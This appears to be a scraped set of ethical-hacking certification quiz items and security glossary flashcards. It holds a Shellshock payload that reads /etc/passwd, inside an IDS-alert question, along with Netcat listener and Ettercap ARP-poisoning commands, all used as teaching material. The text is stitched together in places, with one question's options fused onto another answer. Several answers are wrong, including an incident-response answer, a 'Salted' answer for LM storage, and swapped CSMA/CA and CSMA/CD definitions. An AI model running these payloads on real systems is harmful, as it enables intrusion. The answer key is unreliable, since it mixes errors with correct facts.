D. CurrPorts is not used for static analysis; it is used to examine what ports are open and running on an active machine. Answers A, B, and C are incorrect because they all are tools used for static analysis.
Kevin and his friends are going through a local IT firm's garbage. Which of the following best describes this activity? a. Reconnaissance b. Intelligence gathering c. Social engineering d. Dumpster diving
D. Dumpster diving is the act of going through someone's trash.
Which of the following is one primary difference between a malicious hacker and an ethical hacker? a. Malicious hackers use different tools and techniques than ethical hackers use. b. Malicious hackers are more advanced than ethical hackers because they can use any technique to attack a system or network. c. Ethical hackers obtain permission before bringing down servers or stealing credit card databases. d. Ethical hackers use the same methods but strive to do no harm.
D. Ethical hackers use the same methods but strive to do no harm.
C. A watering hole attack can be described as a means to trick a victim into visiting a website that is infected. The website would be one that the attacker knows the victim visits on a regular basis. a. Loki b. Recub c. Girlfriend d. FPipe
D. FPipe is used specifically for port redirection. Answer A is incorrect because Loki is an ICMP tunneling tool. Answers B and C are incorrect because Recub and Girlfriend are Trojans.
You're concerned that an attacker may have gained access to one of your Linux systems, planted backdoors, and covered her tracks. Which of the following tools could you use to examine the log files? a. Notepad b. Type c. Sc query d. Grep
D. Grep is a Unix command used to search files for the occurrence of a string of characters that matches a specified pattern.
Which individuals believe that hacking and defacing websites can promote social change? a. Ethical hackers b. Gray hat hackers c. Black hat hackers d. Hacktivists
D. Hacktivists seek to promote social change; they believe that defacing websites and hacking servers is acceptable as long as it promotes their goals. Regardless of their motives, hacking remains illegal, and they are subject to the same computer crime laws as any other criminal.
What is the best alternative if you discover that a rootkit has been installed on one of your computers? a. Copy the system files from a known good system b. Perform a trap and trace c. Delete the files and try to determine the source d. Rebuild from known good media
D. If a rootkit is discovered, you will need to rebuild the OS and related files from known-good media. This usually means performing a complete reinstall.
You are part of an incident response team. You have discovered that an attacker broke into the network, planted a rootkit, and secretly installed a cryptominer. To contain the incident and complete the investigation, what is the best alternative now that you found a rootkit has been installed on one of your computers? a. Copy the system files from a known good system b. Perform a trap and trace c. Delete the files and try to determine the source d. Rebuild from known good media
D. If a rootkit is discovered, you will need to rebuild the OS and related files from known-good media. This usually means performing a complete reinstall.
After the completion of the pen test, you have provided the client with a list of controls to implement to reduce the identified risk. What term best describes the risk that remains after the controls have been implemented? a. Gap analysis b. Total risk c. Inherent risk d. Residual risk
D. It is impossible to eliminate all risk. The remaining risk — after the controls are put in place — is known as the residual risk.
Which of the following corresponds to user mode and is the level of least privilege? a. Ring 0 b. Ring 1 c. Ring 2 d. Ring 3
D. Most modern OSs use a ring model where the inner ring, 0, has the most privilege and the outer ring, 3, has the least privilege
When reviewing the Windows core design, which of the following corresponds to user mode and is the level of least privilege? a. Ring 0 b. Ring 1 c. Ring 2 d. Ring 3
D. Most modern OSs use a ring model where the inner ring, 0, has the most privilege and the outer ring, 3, has the least privilege.
You are working with a pen test team that is performing enumeration. You have just seen a team member enter the following command. What does it demonstrate? C:\ user2sid \ \ truck guest S-1-5-21-343818398-789336058-1343024091-501 C:\ sid2user 5 21 343818398 789336058 1343024091 500 Name is Joe Domain is Truck a. The Joe account has a SID of 500. b. The guest account has not been disabled. c. The guest account has been disabled. d. The true administrator is Joe.
D. One important goal of enumeration is to determine the true administrator. In the output, the true administrator is Joe.
One of the members of your red team would like to run Dsniff on a span of the network that is composed of hubs. Which of the following types best describes this attack? a. Active sniffing b. ARP poisoning c. MAC flooding d. Passive sniffing
D. Passive sniffing is all that is required to listen to traffic on a hub.
Which of the following describes a type of malware that restricts access to the computer system's files and folders until a monetary payment is made? a. Crypter b. Trojan c. Spyware d. Ransomware
D. Ransomware is a type of malware that encrypts all files until a payment is made. Answer A is incorrect because a crypter is used to encrypt malware.
Your client has asked you to run an Nmap scan against the servers it has located in its DMZ. The client would like you to identify the OS. Which of the following switches would be your best option? a. nmap -P0 b. nmap -sO c. nmap -sS d. nmap -O
D. Running nmap -O would execute OS guessing.
This application uses clear-text community strings that default to public and private. Which of the following represents the correct port and protocol? a. UDP 69 b. TCP 161 c. TCP 69 d. UDP 161
D. SNMP is UDP based and uses two separate ports: 161 and 162. It is vulnerable because it can send the community strings in clear text.
After finding port 161 open on a targeted system, you have decided to attempt to guess what passwords/community strings to use. Which of the following should you try first? a. user/password b. abc123/passw0rd c. Password/administrator d. Public/private
D. SNMP is a network management tool that is used for collecting information about the status of network devices. Versions 1 and 2 of SNMP use default community strings of public and private.
Which of the following is not a client-side session hijacking technique? a. Malicious JavaScript codes b. XSS c. CSRF d. Session fixation
D. Session fixation is not launched on the client, and the fixed ID must be provided by the attacker. Answers A, B, and C are incorrect because malicious JavaScript codes, cross-site scripting (XSS), and cross-site request forgery (CSRF) are client-side session hijacking techniques.
You've just performed a port scan against an internal device during a routine pen test. Nmap returned the following response: "Starting NMAP 7.30 at 2016-10-10 11: 06 NMAP scan report for 192.168.123.100 Host is up (1.00s latency). Not shown: 993 closed ports PORT STATE SERVICE 80 /tcp open http 161/ tcp open snmp 515/ tcp open lpd MAC Address: 00:1B:A9:01:3a:21" Based on this scan result, which of the following is most likely correct? a. The host is most likely a Windows computer. b. The host is most likely a Linux computer. c. The host is a Cisco router. d. The host is a printer.
D. The OUI of the MAC address shown maps to Brother printer. Also, port 515 is open, which is associated with printers.
Which DNS record gives information about the zone, such as administrator contact and so on? a. CNAME b. MX record c. A record d. Start of Authority
D. The Start of Authority record gives information about the zone, such as the administrator contact.
Which of the following types of rootkits would be found at ring 0? a. Software b. Library c. Application d. Kernel
D. The inner layer of the OS is ring 0. It is at this layer that kernel rootkits are found.
Which of the following types of rootkits would be found at ring 0? a. Software b. Library c. Application d. Kernel
D. The inner layer of the OS is ring 0. It is at this layer that kernel rootkits are found.
During a packet capture, you have found several packets with the same IPID. You believe these packets to be fragmented. One of the packets has an offset value of 5dc hex, and the more bit is off. With this information, which of the following statements is true? a. This might be any fragmented packet except the first in the series. b. This might be any fragmented packet except the last in the series. c. This is the first fragment. d. This is the last fragment.
D. The last fragmented packet will have the more bit set to 0 to indicate that no further packets will follow.
During which step of the incident response process would you be tasked with building the team, identifying roles, and testing the communication system? a. Containment b. Recovery c. Preparation d. Notification
D. The portion of the penetration test where you would be tasked with building the team, identifying roles, and testing the communication system is during notification.
Which of the following Netcat commands could be used to perform a UDP scan of the lower 1024 ports? a. Nc -sS -O target 1-1024 b. Nc -hU < host( s) > c. Nc -sU -p 1-1024 < host( s) > d. Nc -u -v -w2 < host > 1-1024
D. The proper syntax for a UDP scan using Netcat is netcat -u -v -w2 < host > 1-1024. Netcat is considered the Swiss-army knife of hacking tools because it is so versatile.
Your ethical hacking firm has been hired to conduct a penetration test. Which of the following documents limits the scope of your activities? a. Nondisclosure agreement b. PCI-DSS c. Memorandum of understanding d. Terms of engagement
D. The scope of the activity is defined by the terms of engagement.
You have just gotten an alert from your IDS. It has flagged the following string: env x ='(){:;}; echo exploit' bash -c 'cat /etc/passwd'. What is the attacker attempting to do? a. Use the Heartbleed vulnerability to display the passwd file. b. Use the Shellshock vulnerability to change the passwd file. c. Use the Heartbleed vulnerability to change the passwd file. d. Use the Shellshock vulnerability to display the passwd file.
D. The string shown in the question was designed to exploit Shellshock and access the passwd file. Notice the command seeks to cat the file, which is an attempt to view it.
In which layer of the OSI model do SYN flood attacks occur? a. Network b. Data link c. Physical d. Transport
D. The transport layer is the correct answer. TCP can be the target for SYN attacks, which are a form of DoS.
Assume you performed a full backup on Monday and then an incremental backup on Tuesday and Wednesday. If there was on outage on Thursday, what would you need to restore operations? a. The full backup from Monday b. Both incremental backups from Tuesday and Wednesday c. The full backup from Monday and Wednesday's incremental backup d. The full backup from Monday and both incremental backups from Tuesday and Wednesday
D. To recover, you would need the last full backup and both incremental backups.
During an internal pen test, you have gained access to an internal switch. You have been able to SPAN a port and are now monitoring all traffic with Wireshark. While reviewing this traffic, you are able to identify the OS of the devices that are communicating. What best describes this activity? a. Vulnerability scanning b. Nmap port scanning c. Active OS fingerprinting d. Passive OS fingerprinting
D. Using Wireshark to examine the traffic is considered passive OS fingerprinting.
As part of a review of an access control system, you have been asked to recommend a replacement for the username/password system that is currently used. As such, which of the following is best when selecting a biometric system? a. A high false acceptance rate b. A high false rejection rate c. A high false acceptance rate and false rejection rate d. A low crossover error rate
D. When examining biometric systems, one item to consider is the crossover error rate (CER). The lower the CER, the more accurate the system.
Which of the following is best when selecting a biometric system? a. A high false acceptance rate b. A high false rejection rate c. A high false acceptance rate and false rejection rate d. A low crossover error rate
D. When examining biometric systems, one item to consider is the crossover error rate (CER). The lower the CER, the more accurate the system.
During the network mapping phase of a pen test, you have discovered the following two IP addresses: 192.168.1.24 and 192.168.1.35. They both have a mask of 255.255.255.224. Which of the following is true? a. They are on the same network. b. They both have a default gateway of 192.168.1.63. c. They both have a default gateway of 192.168.1.254. d. They are on separate subnets.
D. With a network mask of .224, the first three subnets would include the .0 subnet, the .32 subnet, and the .64 subnet. The IP address of .24 and .35 would fall into different subnet ranges.
Confidentiality
Data or information is not made available or disclosed to unauthorized persons
Confidentiality
Data or information is not made available or disclosed to unauthorized persons.
File
Data stored as a named unit on a data storage medium. Examples include a program, a document, and a database.
Test data
Data that is run through a computer program to test the software. Test data can be used to test compliance with controls in the software.
Operational control
Day-to-day controls that are used for normal daily operation of the organization. Operational controls ensure that normal operational objectives are achieved.
Which type of vulnerability assessment tool typically includes fuzzers that give arbitrary input to a system's interface?
Depth assessment tools
Client/server
Describes the relationship between two computer programs in which one program, the client, makes a service request from another program, the server, which fulfills the request. Clients rely on servers for resources, such as files, devices, and even processing power.
Blu-ray Disc
Designed as a replacement for DVDs. Blu-ray is a high-density optical disk that can hold audio, video, or data.
Destruction
Destroying data, information, or information so that it is deprived from the legitimate user.
Critical path methodology (CPM)
Determines what activities are critical and what dependencies exist among the various tasks.
Secure Sockets Layer (SSL)
Developed by Netscape for transmitting private documents via the Internet. It works by using a private key to encrypt data that is transferred over the SSL connection. It is widely used and accepted by Netscape and Internet Explorer. Very similar to transport layer security (TLS).
Which of the following is considered a nontechnical attack?
Dumpster diving
Recovery time objective (RTO)
During the execution of disaster recovery or business continuity plans, the time goal for the reestablishment and recovery of a business function or resource.
Which of the following tools can be used to clear the Windows logs?
ELSave
Enterprise resource planning (ERP)
ERP systems are software systems used for operational planning and administration, and for optimizing internal business processes. The best-known supplier of these systems is SAP.
Stream cipher
Encrypts data typically one byte at a time.
Availability
Ensures that the systems responsible for delivering, storing and processing data are available and accessible as needed by individuals who are authorized to use the resources
Availability
Ensures that the systems responsible for delivering, storing, and processing data are available and accessible as needed by individuals authorized to use the resources.
topology discovery
Entails determining the devices in the network, their connectivity relationships to one another, and the internal IP addressing scheme in use.
interface testing
Evaluates whether an application's systems or components correctly pass data and control to one another. It verifies whether module interactions are working properly and errors are handled correctly.
Hearsay
Evidence based on what a witness heard someone else say, not what the witness personally observed.
network discovery scan
Examines a range of IP addresses to determine which ports are open. This type of scan only shows a list of systems on the network and the ports in use on the network.
Exclusive-OR (XOR)
Exclusive disjunction (usual symbol XOR) is a logical operator that results in true if one, but not both, of the operands is true.
Patent
Exclusive rights granted by the federal government to an inventor to exclude others from making, using, or selling his or her invention.
Which of the following programs can be used for port redirection?
FPipe
An administrator needs vulnerability research to: (Check all that apply)
Find weaknesses, and alert the network administrator before a network attack To divulge information about weaknesses in the network wrong
Evidence
Gathered by an auditor during the course of an audit. The information gathered stands as proof that can support conclusions of an audit report.
Gold standard
Generally regarded as practices and procedures that are the best of the best.
Separation of duties
Given the seven areas of information security responsibility, separation of duties defines the roles, tasks, responsibilities, and accountabilities for information security uniquely for the different duties of the IT staff and IT security staff.
KeyGhost is an example of what?
HARDWARE KEYLOGGER
Your Windows computer is running erratically and you suspect that spyware has been installed. You have noticed that each time you try to go to an antivirus website, your computer is redirected to another domain and you are flooded with pop-ups. What file did the spyware most likely modify?
HOSTS
While getting ready to pay some bills, you visit your bank's website and prepare to log in. However you notice that the login page now has several additional fields where your bank ATM and your Social Security number are requested. What category of banking Trojan could be responsible for this modification?
HTML injection
Hashing algorithm
Hashing is used to verify the integrity of data and messages. A well-designed hashing algorithm will examines every bit of the data while it is being condensed, and even a slight change to the data will result in a large change in the message hash. It is considered a one-way process.
Entity relationship diagram (ERD)
Helps map the requirements and define the relationship between elements.
Application layer
Highest layer of the seven-layer OSI model. The application layer is used as an interface to applications or communications protocols.
Which of the following is a tool commonly used for enumeration?
Hyena
After two days of work, you successfully exploited a traversal vulnerability and gained root access to a CentOS 6.5 server. Which of the following is the best option to maintain access?
INSTALL NETCAT
How would you use ARP cache poisoning to determine malicious activity on a network?
If you cannot SPAN a port, you can use ARP cache poisoning to see all traffic going to all other ports on the switch.
A business has hired you as a penetration tester after a recent security breach. The attacker was successful at planting a Trojan on one internal server and extracting all of its financial data. Which of the following is an immediate recommendation that you can give the business?
Immediately move the financial data to another system
Field
In a database, the part of a record reserved for a particular type of data; for example, in a library catalog, author, title, ISBN, and subject headings would all be fields.
Buffer overflow
In computer programming, this occurs when a software application somehow writes data beyond the allocated end of a buffer in memory. Buffer overflow is usually caused by software bugs and improper syntax and programming, thus opening or exposing the application to malicious code injections or other targeted attack commands.
Concurrency control
In computer science, or more specifically, in the field of databases, a method used to ensure that database transactions are executed in a safe manner (that is, without data loss). Concurrency control is especially applicable to database-management systems, which must ensure that transactions are executed safely and that they follow the ACID rules.
Log
In computing, the log is equivalent to the history log of ships. The log is an automatic system that records significant events. The files that contain these records are called log files. Generally, the log is a file; what is written on it is a record.
Asymmetric encryption
In cryptography, an asymmetric key algorithm uses a pair of cryptographic keys to encrypt and decrypt. The two keys are related mathematically: A message encrypted by the algorithm using one key can be decrypted by the same algorithm using the other. In a sense, one key "locks" a lock (encryption), but a different key is required to unlock it (decryption).
Fail safe
In the logical sense, fail safe means the process of discovering a system error, terminating the process, and preventing the system from being compromised. The system enters a state in which no access is allowed. In physical systems, a fail safe refers to items such as controlled-access doors. When there is a power failure, the door "fails safe," which means that the door unlocks and people can leave the facility; they are not locked in.
IT asset
Information technology asset such as hardware, software, or data.
Public key infrastructure (PKI)
Infrastructure used to facilitate e-commerce and build trust. PKI consists of hardware, software, people, policies, and procedures; it is used to create, manage, store, distribute, and revoke public key certificates. PKI is based on publickey cryptography.
Synchronize sequence number
Initially passed to the other party at the start of the three-step startup, it is used to track the movement of data between parties. Every byte of data sent over a TCP connection has a sequence number.
Email/interpersonal messaging
Instant messages, usually text, sent from one person to another, or to a group of people, via computer.
Irregularities
Intentional violations of established management policy, or deliberate misstatements, or omissions of information concerning the area under audit or the organization as a whole.
Supply chain management (SCM)
Intercompany planning control and monitoring of central functions such as procurement, production, and sales to increase their efficiency.
Corrective controls
Internal controls designed to resolve problems soon after they arise.
account management
Involves the addition and deletion of accounts that are granted access to systems or networks. It also involves changing the permissions or privileges granted to those accounts.
Which of the following types of biometric systems is considered the most accurate?
Iris scanning
What is one of the disadvantages of using John the Ripper?
It cannot differentiate between uppercase and lowercase passwords.
SNMP is a protocol used to query hosts and other network devices about their network status. One of its key features is its use of network agents to collect and store management information, such as the number of error packets received by a managed device. Which of the following makes it a great target for hackers?
It sends community strings in clear text.
What is a sniffer listening on port 88 attempting to detect?
Kerberos logins
Which of the following types of rootkits would be found at ring 0?
Kernel
Which one of the following statements about the Windows protection ring model is FALSE?
Kernel mode restricts access to all resources.
Which format stores Windows passwords in a 14-character field?
LAN Manager
When discussing Windows authentication, which of the following is considered the weakest?
LM
Which of the following is considered the weakest?
LM
Which type of Windows authentication uses encrypted passwords that are padded to 14 characters?
LM
Which of the following is not a DoS program?
LOIC
Criminal law
Laws pertaining to crimes against the state or conduct detrimental to society. These violations of criminal statues are punishable by law and can include monitory penalties and jail time.
Trademark
Legal protection for a logo, name, or characteristic that can be identified as exclusive.
What is heap spraying?
Loading a large amount of data and some shellcode into a dynamically allocated space
Which one of the following statements best describes DLL injection?
Loading a malicious external library
Cold site
Location that contains no computing-related equipment except for environmental support such as air conditioners and power outlets, and a security system made ready for installing computer equipment.
Device lock
Lock used to secure laptops and other devices from theft.
Which form of sniffing is characterized by a large number of packets with bogus MAC addresses?
MAC flooding
Accreditation
Management's formal acceptance of a system or application.
Edit controls
Manual or automated process to check for and allow the correction of data errors before processing. Edit controls detect errors in the input portion of information.
Which of the following steps are involved in creating a baseline? ( Check all that apply. )
Map the network infrastructure Identify the controls already in place Create an inventory of all assets, and prioritize/rank the critical assets
Which of the following are phases involved in vulnerability management? (Check all that apply.)
Monitoring Vulnerability Assessment Creating Baseline
passive vulnerability scanner (PVS)
Monitors network traffic at the packet layer to determine topology, services, and vulnerabilities.
Guidelines
Much like standards, these are recommendations; they are not hard-and-fast rules.
You have gained access to a system. You would now like to hide a file that will be hidden and streamed behind another. Which of the following file systems is required?
NTFS
Which of the following tools can be used for vulnerability scanning? (Check all that apply.)
Nessus GFI LanGuard OpenVAS
Which of the following best describes Netcat?
Netcat is called the TCP/IP Swiss army knife. It works with Windows and Linux and can read and write data across network connections using TCP or UDP.
Wide area network (WAN)
Network that spans the distance between buildings, cities, and even countries. WANs are LANs connected using wide area network services from telecommunications carriers; they typically use technologies such as standard phone lines-called plain old telephone service (POTS) or public switched telephone network (PSTN)-Integrated Services Digital Network (ISDN), Frame Relay, Asynchronous Transfer Mode (ATM), or other high-speed services.
Before leaving work last night, you configured the following capture filter: not broadcast and not multicast. Today you stop the capture and are preparing to review the traffic. Before doing so, your manager says he believes you were hit with a DoS attack that utilized broadcast traffic. What is the best course of action
None of the above, because the traffic you need to examine is not available.
If you were going to enumerate DNS, which of the following tools could you use?
Nslookup
Which one of the following terms describes logging in to a system with no user ID or password?
Null session
Denial of service (DoS)
Occurs when an attacker consumes the resources on your computer for things it was not intended to be doing, thus preventing normal use of your network resources to legitimate purposes.
Fragmentation
Occurs when files must be split because of maximum transmission unit (MTU) size limitations
Gray box testing
Occurs when tester has only partial knowledge of the network or that is performed to see what internal users have access to
Black box testing
Occurs when the tester has no knowledge of the target or its network structure
Attenuation
Occurs with any signal and can be described as a weakening of the signal that increases as the signal travels farther from the source.
Finger
On some UNIX systems, finger identifies who is logged on and active and sometimes provides personal information about that individual.
Frequency-hopping spread spectrum (FHSS)
One of the basic modulation techniques used in spread-spectrum signal transmission. FHSS is another technique used to make wireless communication harder to intercept and more resistant to interference.
Central processing unit (CPU)
One of the central components of a system, the CPU carries out the vast majority of the calculations performed by a computer. It can be thought of as the "brain" of a computer. The CPU is like a manager or boss, telling what the other components of the system should be doing at a given moment.
Internet Protocol (IP)
One of the key protocols of TCP/IP. The IP protocol is found at Layer 3 (network layer) of the OSI model.
Transmission Control Protocol (TCP)
One of the main protocols of IP. It is used for reliability and guaranteed delivery of data.
Signature scanning
One of the most basic ways of scanning for computer viruses, it works by comparing suspect files and programs to signatures of known viruses stored in a database.
Logic bomb
One of the most dangerous types of malware in that it waits for a predetermined event or an amount of time to execute its payload. Typical used by disgruntled employees for an insider attack.
Written authorization
One of the most important parts of the ethical hack. It gives you permission to perform the tests agreed to by the client.
Integrity
One of the three items considered part of the security triad; the others are confidentiality and availability. It is used to verify the accuracy and completeness of an item.
Trapdoor function
One-way function that describes how asymmetric algorithms function
What does the command nc -n -v -l -p 25 accomplish?
Opens up a Netcat listener on the local computer on port 25
Switch
Operates at Layer 2 of the OSI model. A device that links several separate LANs and provides packet filtering among them. A LAN switch is a device with multiple ports, each of which can support an entire Ethernet or token ring LAN.
Which of the following are denial of service attacks typically not used for?
PUMP AND DUMP
Internet control message protocol (ICMP)
Part of TCP/IP that supports diagnostics and error control. Ping is a type of ICMP message.
Which of the following is a vulnerability assessment methodology where the targeted host is not actively attacked?
Passive assessment
Which one of the following is a technical attack?
Password guessing
Which one of the following is least vulnerable to buffer-overflow attacks?
Perl
Cipher text
Plain text or clear text is what you have before encryption and cipher text is the encrypted result that is scrambled into an illegible form.
Security controls
Policies, standards, procedures, and guideline definitions for various security control areas or topics.
Mobile site
Portable dataprocessing facility transported by trailers to be quickly moved to a business location. Typically used by insurance companies and the military, these facilities provide a ready-conditioned information processing facility that can contain servers, desktop computers, communications equipment, and even microwave and satellite data links.
Port
Ports are used by protocols and applications. Port numbers are divided into three ranges including: Well-Known Ports, Registered Ports, and Dynamic and/or Private Ports. Well-Known Ports are those from 0 through 1023. Registered Ports are those from 1024 through 49151, and Dynamic and/or Private Ports are those from 49152 through 65535.
Polyinstantiation
Prevents inference violations by allowing different versions of information items to exist at different classification levels. For example, an unclassified Navy officer might want information about a ship and might discover that it has left port and is bound for Europe. A Navy officer with classified access then might access the same database and discover that the ship has left port, but is really bound for Iraq.
network vulnerability scan
Probes a targeted system or network to identify vulnerabilities. It is a more complex scan of the network than a network discovery scan.
Work breakdown structure (WBS)
Process orientated; shows what activities need to be completed in a hierarchical manner.
Fourth-generation language (4GL)
Programming languages that are easier to use than lower-level languages such as BASIC, Assembly, or FORTRAN. 4GL languages such as SQL and Python are also known as nonprocedural, natural, or very high-level languages.
Address resolution protocol (ARP)
Protocol used to map a known IP address to an unknown physical address.
Certificate practice statement (CPS)
Provides a detailed explanation of how the certificate authority manages the certificates it issues and associated services such as key management. The CPS acts as a contact between the CA and users, describing the obligations and legal limitations, and setting the foundation for future audits.
Proxy server
Proxy servers stand in place of and are a type of firewall. They are used to improve performance and for added security. A proxy server intercepts all requests to the real server to see whether it can fulfill the requests itself. If not, it forwards the request to the real server.
After finding port 161 open on a targeted system, you have decided to attempt to guess what passwords/community strings to use. Which of the following should you try first?
Public/private
Which of the following is a vulnerability assessment tool? (Check all that apply.)
Qualys Nessus Professional GFI LanGuard OpenVAS Retina CS
Which type of password cracking makes use of the space/time memory trade-off?
Rainbow table
Which of the following uses the faster time-memory trade-off technique and works by precomputing all possible passwords in advance?
Rainbow tables
Which of the following describes a type of malware that restricts access to the computer system's files and folders until a monetary payment is made?
Ransomware
What is the best alternative if you discover that a rootkit has been installed on one of your computers?
Rebuild from known good media
Frame
Relay A type of packetswitching technology that transmits data faster than the X.25 standard. Frame Relay does not perform error correction at each computer in the network. Instead, it simply discards any messages with errors. It is up to the application software at the source and destination to perform error correction and to control for loss of messages.
What is a "pass the hash" attack?
Replaying the hash of a user's password
Which of the following corresponds to user mode and is the level of least privilege?
Ring 3
Data custodian
Role delegated by the data owner that has the responsibility of maintaining and protecting the organization's data.
Veriato Investigator is an example of what?
SOFTWARE KEYLOGGER
Microsoft uses various techniques to protect user account information. The second layer of security on the SAM file is known as what?
SYSKEY
The second layer of security on the SAM file is known as what?
SYSKEY
Which format stores Windows passwords in a 14-character field?
Salted
File type
Search for non-HTML file formats including PDF, DOC, PPT, and others.
Firewall
Security system in hardware or software form used to manage and control both network connectivity and network services. Firewalls act as chokepoints for traffic entering and leaving the network and prevent unrestricted access. Firewalls can be stateful or stateless.
Which of the following best describes a covert communication?
Sending and receiving unauthorized information or data by using a protocol, service, or server to transmit info in a way in which it was not intended to be used
What is the purpose of the command nc -l -v -n -p 80?
Set up a covert channel listening on port 80
Vulnerability scanners classify vulnerabilities by: (Check all that apply.)
Severity level wrong
Risk transference
Shifting the responsibility or burden to another party or individual.
Distributed denial of service (DDoS)
Similar to DoS, except the attack is launched from multiple, distributed agent IP devices.
Middleware
Software that "glues together" two or more types of software (for example, two applications, their operating systems, and the network on which everything works) by translating information between them and exchanging this information over a network without both interacting applications being aware of the middleware.
crypter
Software used to encrypt malware. Some crypters obscure the contents of the Trojan by applying an encryption algorithm. Crypters can use anything from AES, RSA, to even Blowfish, or they might use more basic obfuscation techniques, such as XOR, Base64 encoding, or even ROT13.
Which one of the following phrases best describes biometric authentication?
Something you are
Which of the following protocols uses UDP port 514?
Syslog
Which stage has the primary goal of authenticating to a remote host at the highest possible level?
System hacking
Telecommunications
Systems that transport information over a distance, sending and receiving audio, video, and data signals through electronic means.
Security testing
Techniques used to confirm the design and/or operational effectiveness of security controls implemented within a system. Examples include attack and penetration studies to determine whether adequate controls have been implemented to prevent breach-of-system controls and processes, and password strength testing by using tools such as password crackers.
Closed-circuit television (CCTV)
Television cameras used for video surveillance, in which all components are directly linked via cables or other direct means. A system comprising video transmitters that can feed one or more receivers the captured video. Typically used in banks, casinos, shopping centers, airports, or anywhere that physical security can be enhanced by monitoring events. Placement in these facilities is typically at locations where people enter or leave the facility, or at locations where critical transactions occur.
What does the following command in Ettercap do? ettercap -T -q -F cd.ef -M ARP /192.168.13.100
Tells Ettercap to do a text mode man-in-the-middle attack
Limit check
Test of specified amount fields against stipulated high or low limits of acceptability. When both high and low values are used, the test can be called a range check. MD5 23
ACID test
Test that addresses atomicity, consistency, isolation, and durability. Programmers involved in database management use the ACID test to determine whether a database management system has been properly designed to handle transactions.
Recovery testing
Testing aimed at verifying the system's capability to recover from varying degrees of failure.
Gray box testing
Testing that occurs with only partial knowledge of the network or is performed to see what internal users have access to.
Crossover error rate (CER)
The CER is a comparison measurement for different biometric devices and technologies to measure their accuracy. The CER is the point at which FAR and FRR are equal or cross over. The lower the CER, the more accurate the biometric system.
Which of the following is NOT a characteristic of the National Vulnerability Database (NVD)?
The NVD actively performs vulnerability testing.
Service Set ID (SSID)
The SSID is a sequence of up to 32 letters or numbers that is the ID, or name, of a wireless local area network and is used to differentiate networks.
Target of engagement (TOE)
The TOE is the assessment or pen test target.
Trusted computer system evaluation criteria (TCSEC)
The United States Department of Defense Trusted Computer System Evaluation Criteria, also called theOrange Book. TCSEC is a system designed to evaluate standalone systems that places systems into one of four levels: A, B, C, or D. Its basis of measurement is confidentiality.
Inference
The ability to deduce information about data or activities to which the subject does not have access.
Vulnerability
The absence or weakness of a safeguard in an asset
Vulnerability
The absence or weakness of a safeguard in an asset.
Carrier sense multiple access with collision avoidance (CSMA/CA)
The access method used by local area networking technologies such as ethernet.
Carrier sense multiple access with collision detection (CSMA/CD)
The access method used by local area networking technologies such as token ring.
dynamic analysis
The act of analyzing software or programs while they are executing. Dynamic analysis also relates to the monitoring and analysis of computer activity and network traffic during malware analysis.
Decentralized computing
The act of distributing computing activities and computer processing to different locations.
Shoulder surfing
The act of looking over someone's shoulder to steal their password
War chalking
The act of marking on the wall or sidewalk near a building to indicate it has wireless access.
Spoofing
The act of masking your identity and pretending to be someone else or another device
Spoofing
The act of masking your identity and pretending to be someone else or another device. Common spoofing methods include ARP, DNS, and IP. Is also implemented by email in what is described as phishing schemes.
Phishing
The act of misleading or conning an individual into releasing and providing personal and confidential information to an attacker masquerading as a legitimate individual or business.
Nonattribution
The act of not providing a reference to a source of information.
Evasion
The act of performing activities to avoid detection.
Access point spoofing
The act of pretending to be a legitimate access point with the purpose of tricking individuals to pass traffic by the fake connection so that it can be captured and analyzed.
IT asset valuation
The act of putting a monetary value to an IT asset.
Bluejacking
The act of sending unsolicited messages, pictures, or information to a Bluetooth user.
A RID of 500 is associated with what account?
The administrator account
When reviewing a Windows domain, you are able to extract some account information. A RID of 500 is associated with what account?
The administrator account
Throughput
The amount of data transferred from one place to another or processed in a specified amount of time. Data transfer rates for disk drives and networks are measured in terms of throughput. Typically, throughputs are measured in kilobits per second, megabits per second, and gigabits per second.
Disaster tolerance
The amount of time that an organization can accept the unavailability of IT facilities and services.
static analysis
The analysis of software that is performed without actually executing programs. Static analysis is different from dynamic analysis, which is analysis performed on programs while they are "running" or executing. Static analysis makes use of disassemblers and decompilers to format the data into a human-readable format. It is also a technique used in malware analysis.
Gap analysis
The analysis of the differences between two different states, often for the purpose of determining how to get from point A to point B. Thus the aim is to look at ways to bridge the gap.
Information-processing facility (IPF)
The areas where information is processed, usually the computer room and support areas.
Insecure computing habits
The bad habits that employees, contractors, and third-party users have accumulated over the years can be attributed to the organization's lack of security awareness training, lack of security controls, and lack of any security policies or acceptable use policies (AUPs)
Moore's law
The belief that processing power of computers will double about every 18 months due to the rise in the number of transistors doubling per square inch.
Voice over IP (VolP)
The capability to convert voice or fax calls into data packets for transmission over the Internet or other IP-based networks.
Certificate Revocation List (CRL)
The certification authority's listing of invalid certificates, such as compromised, revoked, or superceded certificates. The CRL is used during the digital signature verification process to check the validity of the certificate from which the public verification key is extracted.
Security by obscurity
The controversial use of secrecy to ensure security.
Latency
The delay that it takes one packet to travel from one node to another.
Due diligence
The execution of due care over time. When you see the term due diligence, think of the first letter of each word and remember "do detect" because due diligence is about finding the threats an organization faces. This is accomplished by using standards, best practices, and checklists.
Risk
The exposure or potential for loss or damage to IT assets within that IT infrastructure
Coupling
The extent of the complexity of interconnections with other modules.
Cohesion
The extent to which a system or subsystem performs a single function.
Echo request
The first part of an ICMP ping message, officially a Type 8.
Media access control (MAC)
The hard-coded address of the physical layer device that is attached to the network. All network interface controllers must have a hard-coded and unique MAC address. The MAC address is 48 bits long.
Librarian
The individual in the corporation responsible for storing, safeguarding, and maintaining data, programs, and computer information.
Network administrator
The individual responsible for the installation, management, and control of a network. When problems with the network arise, this is the person to call.
Copyright
The legal protection given to authors or creators that protects their expressions on a specific subject against unauthorized copying. It is applied to books, paintings, movies, literary works, and any other medium of use.
Probability
The likelihood of an event happening.
Script kiddie
The lowest form of cracker that looks for easy targets or well-worn vulnerabilities.
Zone transfer
The mechanism used by DNS servers to update each other by transferring Resource Record. IT should be a controlled process between to DNS servers but is something that hackers will attempt to perform to steal the organization's DNS information. It can be used to map the network devices.
Corporate governance
The method by which a corporation is directed, administered, or controlled. It includes the laws and customs affecting that direction, as well as the goals for which it is governed. How objectives of an organization are set, the means of attaining such objectives, how performance-monitoring guidelines are determined, and ways to emphasize the importance of using resources efficiently are significant issues within the makeup of such method.
Asynchronous transmission
The method whereby data is sent and received 1 byte at a time.
Demilitarized zone (DMZ)
The middle ground between a trusted internal network and an untrusted, external network. Services that internal and external users must use are typically placed there such as HTTP.
Baseband
The name given to a transmission method in which the entire bandwidth (the rate at which information travels through a network connection) is used to transmit just one signal.
Risk management
